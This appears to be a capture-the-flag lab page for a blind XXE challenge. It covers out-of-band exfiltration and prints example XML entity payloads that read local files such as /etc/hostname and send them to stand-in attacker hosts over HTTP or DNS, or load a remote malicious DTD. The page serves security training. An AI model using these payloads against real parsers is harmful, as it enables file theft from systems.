Blind XXE Challenge

Easy 150 Points Blind XXE - Out-of-Band Exfiltration

Challenge Description

This XML parser is vulnerable to XXE, but doesn't reflect the entity values in the response. You need to use out-of-band (OOB) techniques to exfiltrate data to your controlled server.

Objective: Use blind XXE techniques to exfiltrate the flag via HTTP callbacks or DNS lookups. The flag format is FLAG{...}

Configuration

Your Attacker Server (Callback URL)

http://

This simulates your callback server that will receive exfiltrated data.

XML Parser (Blind - No Reflection)

XML Input

Example Blind XXE Payloads (ATTACKER = your server)

HTTP Callback Log 0

No HTTP callbacks received yet.

DNS Lookup Log 0

No DNS lookups received yet.

Submit Flag

Hints -10% per hint

Hints revealed: 0 / 5
Score penalty: 0%

OOB Techniques

HTTP Exfiltration:

<!ENTITY % data SYSTEM "file:///secret">
<!ENTITY % exfil SYSTEM "http://attacker/?d=%data;">

DNS Exfiltration:

<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % dns SYSTEM "http://%data;.attacker.com">

External DTD:

<!ENTITY % remote SYSTEM "http://attacker/evil.dtd">
%remote;

Learning Resources